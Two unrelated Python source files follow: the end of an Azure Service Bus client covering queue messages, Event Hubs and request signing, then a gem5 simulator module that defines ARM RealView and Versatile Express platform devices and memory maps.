request.path = '/' + _str(queue_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def unlock_queue_message(self, queue_name, sequence_number, lock_token):
'''
Unlocks a message for processing by other receivers on a given
subscription. This operation deletes the lock object, causing the
message to be unlocked. A message must have first been locked by a
receiver before this operation is called.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def read_delete_queue_message(self, queue_name, timeout='60'):
'''
Reads and deletes a message from a queue as an atomic operation. This
operation should be used when a best-effort guarantee is sufficient
for an application; that is, using this operation it is possible for
messages to be lost if processing fails.
queue_name:
Name of the queue.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def delete_queue_message(self, queue_name, sequence_number, lock_token):
'''
Completes processing on a locked message and delete it from the queue.
This operation should only be called after processing a previously
locked message is successful to maintain At-Least-Once delivery
assurances.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be deleted as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def receive_queue_message(self, queue_name, peek_lock=True, timeout=60):
'''
Receive a message from a queue for processing.
queue_name:
Name of the queue.
peek_lock:
Optional. True to retrieve and lock the message. False to read and
delete the message. Default is True (lock).
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
if peek_lock:
return self.peek_lock_queue_message(queue_name, timeout)
else:
return self.read_delete_queue_message(queue_name, timeout)
def receive_subscription_message(self, topic_name, subscription_name,
peek_lock=True, timeout=60):
'''
Receive a message from a subscription for processing.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
peek_lock:
Optional. True to retrieve and lock the message. False to read and
delete the message. Default is True (lock).
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
if peek_lock:
return self.peek_lock_subscription_message(topic_name,
subscription_name,
timeout)
else:
return self.read_delete_subscription_message(topic_name,
subscription_name,
timeout)
def create_event_hub(self, hub_name, hub=None, fail_on_exist=False):
'''
Creates a new Event Hub.
hub_name:
Name of event hub.
hub:
Optional. Event hub properties. Instance of EventHub class.
hub.message_retention_in_days:
Number of days to retain the events for this Event Hub.
hub.status: Status of the Event Hub (enabled or disabled).
hub.user_metadata: User metadata.
hub.partition_count: Number of shards on the Event Hub.
fail_on_exist:
Specify whether to throw an exception when the event hub exists.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.body = _get_request_body(_convert_event_hub_to_xml(hub))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def update_event_hub(self, hub_name, hub=None):
'''
Updates an Event Hub.
hub_name:
Name of event hub.
hub:
Optional. Event hub properties. Instance of EventHub class.
hub.message_retention_in_days:
Number of days to retain the events for this Event Hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.body = _get_request_body(_convert_event_hub_to_xml(hub))
request.path, request.query = _update_request_uri_query(request)
request.headers.append(('If-Match', '*'))
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_event_hub(response)
def delete_event_hub(self, hub_name, fail_not_exist=False):
'''
Deletes an Event Hub. This operation will also remove all associated
state.
hub_name:
Name of the event hub to delete.
fail_not_exist:
Specify whether to throw an exception if the event hub doesn't exist.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_event_hub(self, hub_name):
'''
Retrieves an existing event hub.
hub_name:
Name of the event hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_event_hub(response)
def send_event(self, hub_name, message, device_id=None,
broker_properties=None):
'''
Sends a new message event to an Event Hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
if device_id:
request.path = '/{0}/publishers/{1}/messages?api-version=2014-01'.format(hub_name, device_id)
else:
request.path = '/{0}/messages?api-version=2014-01'.format(hub_name)
if broker_properties:
request.headers.append(
('BrokerProperties', str(broker_properties)))
request.body = _get_request_body(message)
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def _get_host(self):
return self.service_namespace + self.host_base
def _perform_request(self, request):
try:
resp = self._filter(request)
except HTTPError as ex:
return _service_bus_error_handler(ex)
return resp
def _update_service_bus_header(self, request):
''' Add additional headers for service bus. '''
if request.method in ['PUT', 'POST', 'MERGE', 'DELETE']:
request.headers.append(('Content-Length', str(len(request.body))))
# if it is not GET or HEAD request, must set content-type.
if not request.method in ['GET', 'HEAD']:
for name, _ in request.headers:
if 'content-type' == name.lower():
break
else:
request.headers.append(
('Content-Type',
'application/atom+xml;type=entry;charset=utf-8'))
# Adds authorization header for authentication.
self.authentication.sign_request(request, self._httpclient)
return request.headers
# Token cache for Authentication
# Shared by the different instances of ServiceBusWrapTokenAuthentication
_tokens = {}
class ServiceBusWrapTokenAuthentication:
def __init__(self, account_key, issuer):
self.account_key = account_key
self.issuer = issuer
def sign_request(self, request, httpclient):
request.headers.append(
('Authorization', self._get_authorization(request, httpclient)))
def _get_authorization(self, request, httpclient):
''' return the signed string with token. '''
return 'WRAP access_token="' + \
self._get_token(request.host, request.path, httpclient) + '"'
def _token_is_expired(self, token):
''' Check if token expires or not. '''
time_pos_begin = token.find('ExpiresOn=') + len('ExpiresOn=')
time_pos_end = token.find('&', time_pos_begin)
token_expire_time = int(token[time_pos_begin:time_pos_end])
time_now = time.mktime(time.localtime())
# Adding 30 seconds so the token wouldn't be expired when we send the
# token to server.
return (token_expire_time - time_now) < 30
def _get_token(self, host, path, httpclient):
'''
Returns token for the request.
host:
the service bus service request.
path:
the service bus service request.
'''
wrap_scope = 'http://' + host + path + self.issuer + self.account_key
# Check whether has unexpired cache, return cached token if it is still
# usable.
if wrap_scope in _tokens:
token = _tokens[wrap_scope]
if not self._token_is_expired(token):
return token
# get token from accessconstrol server
request = HTTPRequest()
request.protocol_override = 'https'
request.host = host.replace('.servicebus.', '-sb.accesscontrol.')
request.method = 'POST'
request.path = '/WRAPv0.9'
request.body = ('wrap_name=' + url_quote(self.issuer) +
'&wrap_password=' + url_quote(self.account_key) +
'&wrap_scope=' +
url_quote('http://' + host + path)).encode('utf-8')
request.headers.append(('Content-Length', str(len(request.body))))
resp = httpclient.perform_request(request)
token = resp.body.decode('utf-8-sig')
token = url_unquote(token[token.find('=') + 1:token.rfind('&')])
_tokens[wrap_scope] = token
return token
class ServiceBusSASAuthentication:
def __init__(self, key_name, key_value):
self.key_name = key_name
self.key_value = key_value
def sign_request(self, request, httpclient):
request.headers.append(
('Authorization', self._get_authorization(request, httpclient)))
def _get_authorization(self, request, httpclient):
uri = httpclient.get_uri(request)
uri = url_quote(uri, '').lower()
expiry = str(self._get_expiry())
to_sign = uri + '\n' + expiry
signature = url_quote(_sign_string(self.key_value, to_sign, False), '')
auth_format = 'SharedAccessSignature sig={0}&se={1}&skn={2}&sr={3}'
auth = auth_format.format(signature, expiry, self.key_name, uri)
return auth
def _get_expiry(self):
'''Returns the UTC datetime, in seconds since Epoch, when this signed
request expires (5 minutes from now).'''
return int(round(time.time() + 300))
|
|
# Copyright (c) 2009-2014 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
# Gabe Black
# William Wang
from m5.params import *
from m5.proxy import *
from Device import BasicPioDevice, PioDevice, IsaFake, BadAddr, DmaDevice
from Pci import PciConfigAll
from Ethernet import NSGigE, IGbE_igb, IGbE_e1000
from Ide import *
from Platform import Platform
from Terminal import Terminal
from Uart import Uart
from SimpleMemory import SimpleMemory
from Gic import *
from EnergyCtrl import EnergyCtrl
class AmbaPioDevice(BasicPioDevice):
type = 'AmbaPioDevice'
abstract = True
cxx_header = "dev/arm/amba_device.hh"
amba_id = Param.UInt32("ID of AMBA device for kernel detection")
class AmbaIntDevice(AmbaPioDevice):
type = 'AmbaIntDevice'
abstract = True
cxx_header = "dev/arm/amba_device.hh"
gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
int_num = Param.UInt32("Interrupt number that connects to GIC")
int_delay = Param.Latency("100ns",
"Time between action and interrupt generation by device")
class AmbaDmaDevice(DmaDevice):
type = 'AmbaDmaDevice'
abstract = True
cxx_header = "dev/arm/amba_device.hh"
pio_addr = Param.Addr("Address for AMBA slave interface")
pio_latency = Param.Latency("10ns", "Time between action and write/read result by AMBA DMA Device")
gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
int_num = Param.UInt32("Interrupt number that connects to GIC")
amba_id = Param.UInt32("ID of AMBA device for kernel detection")
class A9SCU(BasicPioDevice):
type = 'A9SCU'
cxx_header = "dev/arm/a9scu.hh"
class RealViewCtrl(BasicPioDevice):
type = 'RealViewCtrl'
cxx_header = "dev/arm/rv_ctrl.hh"
proc_id0 = Param.UInt32(0x0C000000, "Processor ID, SYS_PROCID")
proc_id1 = Param.UInt32(0x0C000222, "Processor ID, SYS_PROCID1")
idreg = Param.UInt32(0x00000000, "ID Register, SYS_ID")
class VGic(PioDevice):
type = 'VGic'
cxx_header = "dev/arm/vgic.hh"
gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
platform = Param.Platform(Parent.any, "Platform this device is part of.")
vcpu_addr = Param.Addr(0, "Address for vcpu interfaces")
hv_addr = Param.Addr(0, "Address for hv control")
pio_delay = Param.Latency('10ns', "Delay for PIO r/w")
# The number of list registers is not currently configurable at runtime.
ppint = Param.UInt32("HV maintenance interrupt number")
class AmbaFake(AmbaPioDevice):
type = 'AmbaFake'
cxx_header = "dev/arm/amba_fake.hh"
ignore_access = Param.Bool(False, "Ignore reads/writes to this device, (e.g. IsaFake + AMBA)")
amba_id = 0;
class Pl011(Uart):
type = 'Pl011'
cxx_header = "dev/arm/pl011.hh"
gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
int_num = Param.UInt32("Interrupt number that connects to GIC")
end_on_eot = Param.Bool(False, "End the simulation when a EOT is received on the UART")
int_delay = Param.Latency("100ns", "Time between action and interrupt generation by UART")
class Sp804(AmbaPioDevice):
type = 'Sp804'
cxx_header = "dev/arm/timer_sp804.hh"
gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
int_num0 = Param.UInt32("Interrupt number that connects to GIC")
clock0 = Param.Clock('1MHz', "Clock speed of the input")
int_num1 = Param.UInt32("Interrupt number that connects to GIC")
clock1 = Param.Clock('1MHz', "Clock speed of the input")
amba_id = 0x00141804
class CpuLocalTimer(BasicPioDevice):
type = 'CpuLocalTimer'
cxx_header = "dev/arm/timer_cpulocal.hh"
gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
int_num_timer = Param.UInt32("Interrrupt number used per-cpu to GIC")
int_num_watchdog = Param.UInt32("Interrupt number for per-cpu watchdog to GIC")
class GenericTimer(SimObject):
type = 'GenericTimer'
cxx_header = "dev/arm/generic_timer.hh"
system = Param.System(Parent.any, "system")
gic = Param.BaseGic(Parent.any, "GIC to use for interrupting")
int_num = Param.UInt32("Interrupt number used per-cpu to GIC")
# @todo: for now only one timer per CPU is supported, which is the
# normal behaviour when Security and Virt. extensions are disabled.
class PL031(AmbaIntDevice):
type = 'PL031'
cxx_header = "dev/arm/rtc_pl031.hh"
time = Param.Time('01/01/2009', "System time to use ('Now' for actual time)")
amba_id = 0x00341031
class Pl050(AmbaIntDevice):
type = 'Pl050'
cxx_header = "dev/arm/kmi.hh"
vnc = Param.VncInput(Parent.any, "Vnc server for remote frame buffer display")
is_mouse = Param.Bool(False, "Is this interface a mouse, if not a keyboard")
int_delay = '1us'
amba_id = 0x00141050
class Pl111(AmbaDmaDevice):
type = 'Pl111'
cxx_header = "dev/arm/pl111.hh"
pixel_clock = Param.Clock('24MHz', "Pixel clock")
vnc = Param.VncInput(Parent.any, "Vnc server for remote frame buffer display")
amba_id = 0x00141111
#enable_capture = Param.Bool(True, "capture frame to system.framebuffer.bmp")
enable_capture = Param.Bool(False, "capture frame to system.framebuffer.bmp")#lokesh
class HDLcd(AmbaDmaDevice):
type = 'HDLcd'
cxx_header = "dev/arm/hdlcd.hh"
# For reference, 1024x768MR-16@60 ~= 56 MHz
# 1920x1080MR-16@60 ~= 137 MHz
# 3840x2160MR-16@60 ~= 533 MHz
# Match against the resolution selected in the Linux DTS/DTB file.
pixel_clock = Param.Clock('137MHz', "Clock frequency of the pixel clock "
"(i.e. PXLREFCLK / OSCCLK 5")
vnc = Param.VncInput(Parent.any, "Vnc server for remote frame buffer "
"display")
amba_id = 0x00141000
#enable_capture = Param.Bool(True, "capture frame to system.framebuffer.bmp")
enable_capture = Param.Bool(False, "capture frame to system.framebuffer.bmp")#lokesh
class RealView(Platform):
type = 'RealView'
cxx_header = "dev/arm/realview.hh"
system = Param.System(Parent.any, "system")
pci_io_base = Param.Addr(0, "Base address of PCI IO Space")
pci_cfg_base = Param.Addr(0, "Base address of PCI Configuraiton Space")
pci_cfg_gen_offsets = Param.Bool(False, "Should the offsets used for PCI cfg access"
" be compatible with the pci-generic-host or the legacy host bridge?")
_mem_regions = [(Addr(0), Addr('256MB'))]
def attachPciDevices(self):
pass
def enableMSIX(self):
pass
def onChipIOClkDomain(self, clkdomain):
pass
def offChipIOClkDomain(self, clkdomain):
pass
def setupBootLoader(self, mem_bus, cur_sys, loc):
self.nvmem = SimpleMemory(range = AddrRange('2GB', size = '64MB'),
conf_table_reported = False)
self.nvmem.port = mem_bus.master
cur_sys.boot_loader = loc('boot.arm')
cur_sys.atags_addr = 0x100
cur_sys.load_addr_mask = 0xfffffff
cur_sys.load_offset = 0
# Reference for memory map and interrupt number
# RealView Platform Baseboard Explore for Cortex-A9 User Guide(ARM DUI 0440A)
# Chapter 4: Programmer's Reference
class RealViewPBX(RealView):
uart = Pl011(pio_addr=0x10009000, int_num=44)
realview_io = RealViewCtrl(pio_addr=0x10000000)
gic = Pl390()
timer0 = Sp804(int_num0=36, int_num1=36, pio_addr=0x10011000)
timer1 = Sp804(int_num0=37, int_num1=37, pio_addr=0x10012000)
local_cpu_timer = CpuLocalTimer(int_num_timer=29, int_num_watchdog=30, pio_addr=0x1f000600)
clcd = Pl111(pio_addr=0x10020000, int_num=55)
kmi0 = Pl050(pio_addr=0x10006000, int_num=52)
kmi1 = Pl050(pio_addr=0x10007000, int_num=53, is_mouse=True)
a9scu = A9SCU(pio_addr=0x1f000000)
cf_ctrl = IdeController(disks=[], pci_func=0, pci_dev=7, pci_bus=2,
io_shift = 1, ctrl_offset = 2, Command = 0x1,
BAR0 = 0x18000000, BAR0Size = '16B',
BAR1 = 0x18000100, BAR1Size = '1B',
BAR0LegacyIO = True, BAR1LegacyIO = True)
l2x0_fake = IsaFake(pio_addr=0x1f002000, pio_size=0xfff)
flash_fake = IsaFake(pio_addr=0x40000000, pio_size=0x20000000,
fake_mem=True)
dmac_fake = AmbaFake(pio_addr=0x10030000)
uart1_fake = AmbaFake(pio_addr=0x1000a000)
uart2_fake = AmbaFake(pio_addr=0x1000b000)
uart3_fake = AmbaFake(pio_addr=0x1000c000)
smc_fake = AmbaFake(pio_addr=0x100e1000)
sp810_fake = AmbaFake(pio_addr=0x10001000, ignore_access=True)
watchdog_fake = AmbaFake(pio_addr=0x10010000)
gpio0_fake = AmbaFake(pio_addr=0x10013000)
gpio1_fake = AmbaFake(pio_addr=0x10014000)
gpio2_fake = AmbaFake(pio_addr=0x10015000)
ssp_fake = AmbaFake(pio_addr=0x1000d000)
sci_fake = AmbaFake(pio_addr=0x1000e000)
aaci_fake = AmbaFake(pio_addr=0x10004000)
mmc_fake = AmbaFake(pio_addr=0x10005000)
rtc = PL031(pio_addr=0x10017000, int_num=42)
energy_ctrl = EnergyCtrl(pio_addr=0x1000f000)
# Attach I/O devices that are on chip and also set the appropriate
# ranges for the bridge
def attachOnChipIO(self, bus, bridge):
self.gic.pio = bus.master
self.l2x0_fake.pio = bus.master
self.a9scu.pio = bus.master
self.local_cpu_timer.pio = bus.master
# Bridge ranges based on excluding what is part of on-chip I/O
# (gic, l2x0, a9scu, local_cpu_timer)
bridge.ranges = [AddrRange(self.realview_io.pio_addr,
self.a9scu.pio_addr - 1),
AddrRange(self.flash_fake.pio_addr,
self.flash_fake.pio_addr + \
self.flash_fake.pio_size - 1)]
# Set the clock domain for IO objects that are considered
# to be "close" to the cores.
def onChipIOClkDomain(self, clkdomain):
self.gic.clk_domain = clkdomain
self.l2x0_fake.clk_domain = clkdomain
self.a9scu.clkdomain = clkdomain
self.local_cpu_timer.clk_domain = clkdomain
# Attach I/O devices to specified bus object. Can't do this
# earlier, since the bus object itself is typically defined at the
# System level.
def attachIO(self, bus):
self.uart.pio = bus.master
self.realview_io.pio = bus.master
self.timer0.pio = bus.master
self.timer1.pio = bus.master
self.clcd.pio = bus.master
self.clcd.dma = bus.slave
self.kmi0.pio = bus.master
self.kmi1.pio = bus.master
self.cf_ctrl.pio = bus.master
self.cf_ctrl.config = bus.master
self.cf_ctrl.dma = bus.slave
self.dmac_fake.pio = bus.master
self.uart1_fake.pio = bus.master
self.uart2_fake.pio = bus.master
self.uart3_fake.pio = bus.master
self.smc_fake.pio = bus.master
self.sp810_fake.pio = bus.master
self.watchdog_fake.pio = bus.master
self.gpio0_fake.pio = bus.master
self.gpio1_fake.pio = bus.master
self.gpio2_fake.pio = bus.master
self.ssp_fake.pio = bus.master
self.sci_fake.pio = bus.master
self.aaci_fake.pio = bus.master
self.mmc_fake.pio = bus.master
self.rtc.pio = bus.master
self.flash_fake.pio = bus.master
self.energy_ctrl.pio = bus.master
# Set the clock domain for IO objects that are considered
# to be "far" away from the cores.
def offChipIOClkDomain(self, clkdomain):
self.uart.clk_domain = clkdomain
self.realview_io.clk_domain = clkdomain
self.timer0.clk_domain = clkdomain
self.timer1.clk_domain = clkdomain
self.clcd.clk_domain = clkdomain
self.kmi0.clk_domain = clkdomain
self.kmi1.clk_domain = clkdomain
self.cf_ctrl.clk_domain = clkdomain
self.dmac_fake.clk_domain = clkdomain
self.uart1_fake.clk_domain = clkdomain
self.uart2_fake.clk_domain = clkdomain
self.uart3_fake.clk_domain = clkdomain
self.smc_fake.clk_domain = clkdomain
self.sp810_fake.clk_domain = clkdomain
self.watchdog_fake.clk_domain = clkdomain
self.gpio0_fake.clk_domain = clkdomain
self.gpio1_fake.clk_domain = clkdomain
self.gpio2_fake.clk_domain = clkdomain
self.ssp_fake.clk_domain = clkdomain
self.sci_fake.clk_domain = clkdomain
self.aaci_fake.clk_domain = clkdomain
self.mmc_fake.clk_domain = clkdomain
self.rtc.clk_domain = clkdomain
self.flash_fake.clk_domain = clkdomain
self.energy_ctrl.clk_domain = clkdomain
# Reference for memory map and interrupt number
# RealView Emulation Baseboard User Guide (ARM DUI 0143B)
# Chapter 4: Programmer's Reference
class RealViewEB(RealView):
uart = Pl011(pio_addr=0x10009000, int_num=44)
realview_io = RealViewCtrl(pio_addr=0x10000000, idreg=0x01400500)
gic = Pl390(dist_addr=0x10041000, cpu_addr=0x10040000)
timer0 = Sp804(int_num0=36, int_num1=36, pio_addr=0x10011000)
timer1 = Sp804(int_num0=37, int_num1=37, pio_addr=0x10012000)
clcd = Pl111(pio_addr=0x10020000, int_num=23)
kmi0 = Pl050(pio_addr=0x10006000, int_num=20)
kmi1 = Pl050(pio_addr=0x10007000, int_num=21, is_mouse=True)
l2x0_fake = IsaFake(pio_addr=0x1f002000, pio_size=0xfff, warn_access="1")
flash_fake = IsaFake(pio_addr=0x40000000, pio_size=0x20000000-1,
fake_mem=True)
dmac_fake = AmbaFake(pio_addr=0x10030000)
uart1_fake = AmbaFake(pio_addr=0x1000a000)
uart2_fake = AmbaFake(pio_addr=0x1000b000)
uart3_fake = AmbaFake(pio_addr=0x1000c000)
smcreg_fake = IsaFake(pio_addr=0x10080000, pio_size=0x10000-1)
smc_fake = AmbaFake(pio_addr=0x100e1000)
sp810_fake = AmbaFake(pio_addr=0x10001000, ignore_access=True)
watchdog_fake = AmbaFake(pio_addr=0x10010000)
gpio0_fake = AmbaFake(pio_addr=0x10013000)
gpio1_fake = AmbaFake(pio_addr=0x10014000)
gpio2_fake = AmbaFake(pio_addr=0x10015000)
ssp_fake = AmbaFake(pio_addr=0x1000d000)
sci_fake = AmbaFake(pio_addr=0x1000e000)
aaci_fake = AmbaFake(pio_addr=0x10004000)
mmc_fake = AmbaFake(pio_addr=0x10005000)
rtc_fake = AmbaFake(pio_addr=0x10017000, amba_id=0x41031)
energy_ctrl = EnergyCtrl(pio_addr=0x1000f000)
# Attach I/O devices that are on chip and also set the appropriate
# ranges for the bridge
def attachOnChipIO(self, bus, bridge):
self.gic.pio = bus.master
self.l2x0_fake.pio = bus.master
# Bridge ranges based on excluding what is part of on-chip I/O
# (gic, l2x0)
bridge.ranges = [AddrRange(self.realview_io.pio_addr,
self.gic.cpu_addr - 1),
AddrRange(self.flash_fake.pio_addr, Addr.max)]
# Set the clock domain for IO objects that are considered
# to be "close" to the cores.
def onChipIOClkDomain(self, clkdomain):
self.gic.clk_domain = clkdomain
self.l2x0_fake.clk_domain = clkdomain
# Attach I/O devices to specified bus object. Can't do this
# earlier, since the bus object itself is typically defined at the
# System level.
def attachIO(self, bus):
self.uart.pio = bus.master
self.realview_io.pio = bus.master
self.timer0.pio = bus.master
self.timer1.pio = bus.master
self.clcd.pio = bus.master
self.clcd.dma = bus.slave
self.kmi0.pio = bus.master
self.kmi1.pio = bus.master
self.dmac_fake.pio = bus.master
self.uart1_fake.pio = bus.master
self.uart2_fake.pio = bus.master
self.uart3_fake.pio = bus.master
self.smc_fake.pio = bus.master
self.sp810_fake.pio = bus.master
self.watchdog_fake.pio = bus.master
self.gpio0_fake.pio = bus.master
self.gpio1_fake.pio = bus.master
self.gpio2_fake.pio = bus.master
self.ssp_fake.pio = bus.master
self.sci_fake.pio = bus.master
self.aaci_fake.pio = bus.master
self.mmc_fake.pio = bus.master
self.rtc_fake.pio = bus.master
self.flash_fake.pio = bus.master
self.smcreg_fake.pio = bus.master
self.energy_ctrl.pio = bus.master
# Set the clock domain for IO objects that are considered
# to be "far" away from the cores.
def offChipIOClkDomain(self, clkdomain):
self.uart.clk_domain = clkdomain
self.realview_io.clk_domain = clkdomain
self.timer0.clk_domain = clkdomain
self.timer1.clk_domain = clkdomain
self.clcd.clk_domain = clkdomain
self.kmi0.clk_domain = clkdomain
self.kmi1.clk_domain = clkdomain
self.dmac_fake.clk_domain = clkdomain
self.uart1_fake.clk_domain = clkdomain
self.uart2_fake.clk_domain = clkdomain
self.uart3_fake.clk_domain = clkdomain
self.smc_fake.clk_domain = clkdomain
self.sp810_fake.clk_domain = clkdomain
self.watchdog_fake.clk_domain = clkdomain
self.gpio0_fake.clk_domain = clkdomain
self.gpio1_fake.clk_domain = clkdomain
self.gpio2_fake.clk_domain = clkdomain
self.ssp_fake.clk_domain = clkdomain
self.sci_fake.clk_domain = clkdomain
self.aaci_fake.clk_domain = clkdomain
self.mmc_fake.clk_domain = clkdomain
self.rtc.clk_domain = clkdomain
self.flash_fake.clk_domain = clkdomain
self.smcreg_fake.clk_domain = clkdomain
self.energy_ctrl.clk_domain = clkdomain
class VExpress_EMM(RealView):
_mem_regions = [(Addr('2GB'), Addr('2GB'))]
pci_cfg_base = 0x30000000
uart = Pl011(pio_addr=0x1c090000, int_num=37)
realview_io = RealViewCtrl(proc_id0=0x14000000, proc_id1=0x14000000, \
idreg=0x02250000, pio_addr=0x1C010000)
gic = Pl390(dist_addr=0x2C001000, cpu_addr=0x2C002000)
local_cpu_timer = CpuLocalTimer(int_num_timer=29, int_num_watchdog=30, pio_addr=0x2C080000)
generic_timer = GenericTimer(int_num=29)
timer0 = Sp804(int_num0=34, int_num1=34, pio_addr=0x1C110000, clock0='1MHz', clock1='1MHz')
timer1 = Sp804(int_num0=35, int_num1=35, pio_addr=0x1C120000, clock0='1MHz', clock1='1MHz')
clcd = Pl111(pio_addr=0x1c1f0000, int_num=46)
hdlcd = HDLcd(pio_addr=0x2b000000, int_num=117)
kmi0 = Pl050(pio_addr=0x1c060000, int_num=44)
kmi1 = Pl050(pio_addr=0x1c070000, int_num=45, is_mouse=True)
vgic = VGic(vcpu_addr=0x2c006000, hv_addr=0x2c004000, ppint=25)
cf_ctrl = IdeController(disks=[], pci_func=0, pci_dev=0, pci_bus=2,
io_shift = 2, ctrl_offset = 2, Command = 0x1,
BAR0 = 0x1C1A0000, BAR0Size = '256B',
BAR1 = 0x1C1A0100, BAR1Size = '4096B',
BAR0LegacyIO = True, BAR1LegacyIO = True)
pciconfig = PciConfigAll(size='256MB')
vram = SimpleMemory(range = AddrRange(0x18000000, size='32MB'),
conf_table_reported = False)
rtc = PL031(pio_addr=0x1C170000, int_num=36)
l2x0_fake = IsaFake(pio_addr=0x2C100000, pio_size=0xfff)
uart1_fake = AmbaFake(pio_addr=0x1C0A0000)
uart2_fake = AmbaFake(pio_addr=0x1C0B0000)
uart3_fake = AmbaFake(pio_addr=0x1C0C0000)
sp810_fake = AmbaFake(pio_addr=0x1C020000, ignore_access=True)
watchdog_fake = AmbaFake(pio_addr=0x1C0F0000)
aaci_fake = AmbaFake(pio_addr=0x1C040000)
lan_fake = IsaFake(pio_addr=0x1A000000, pio_size=0xffff)
usb_fake = IsaFake(pio_addr=0x1B000000, pio_size=0x1ffff)
mmc_fake = AmbaFake(pio_addr=0x1c050000)
energy_ctrl = EnergyCtrl(pio_addr=0x1c080000)
# Attach any PCI devices that are supported
def attachPciDevices(self):
self.ethernet = IGbE_e1000(pci_bus=0, pci_dev=0, pci_func=0,
InterruptLine=1, InterruptPin=1)
self.ide = IdeController(disks = [], pci_bus=0, pci_dev=1, pci_func=0,
InterruptLine=2, InterruptPin=2)
def enableMSIX(self):
self.gic = Pl390(dist_addr=0x2C001000, cpu_addr=0x2C002000, it_lines=512)
